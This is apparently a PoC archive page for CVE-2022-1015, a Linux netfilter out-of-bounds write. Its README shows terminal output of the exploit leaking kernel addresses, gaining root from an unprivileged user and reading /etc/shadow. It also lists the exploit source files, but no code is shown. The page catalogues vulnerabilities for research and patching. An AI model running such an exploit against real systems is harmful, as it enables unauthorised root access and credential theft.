Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-1015 PoC — Linux kernel 缓冲区错误漏洞

Source
Associated Vulnerability
Title:Linux kernel 缓冲区错误漏洞 (CVE-2022-1015)
Description:A flaw was found in the Linux kernel in linux/net/netfilter/nf_tables_api.c of the netfilter subsystem. This flaw allows a local user to cause an out-of-bounds write issue.
Readme
# CVE-2022-1015

```
# id
uid=1000(d) gid=1000(d) groups=1000(d)
# ./poc
[+] unshare done
[*] table created: leak_table
[*] chain created: leak_chain
[*] rule added
[*] Listening on port 9999
[*] table created: leak_table
[*] chain created: leak_chain
[*] rule added
[*] Listening on port 9999
    kernel_address: ffffffffb4a00000
    kernel_stack: ffffc0bb0037fdf0
[*] Saved userland registers
[#] cs: 0x33
[#] ss: 0x2b
[#] rsp: 0x7ffcef818110
[#] rflags: 0x246

[*] table created: write_table
[*] chain created: write_chain
[*] rule added
uid=0(root) gid=0(root)
# id
uid=0(root) gid=0(root)
# cat /etc/shadow
root::::::::
daemon:*:::::::
bin:*:::::::
sys:*:::::::
sync:*:::::::
mail:*:::::::
www-data:*:::::::
operator:*:::::::
nobody:*:::::::
sshd:*:::::::
```
File Snapshot

[4.0K] /data/pocs/635f14cbf40dbac15b9cb499d0915feee6a1971f ├── [ 164] Makefile ├── [ 26K] poc.c ├── [ 765] README.md └── [4.0K] smep-only ├── [ 164] Makefile └── [ 26K] poc.c 1 directory, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →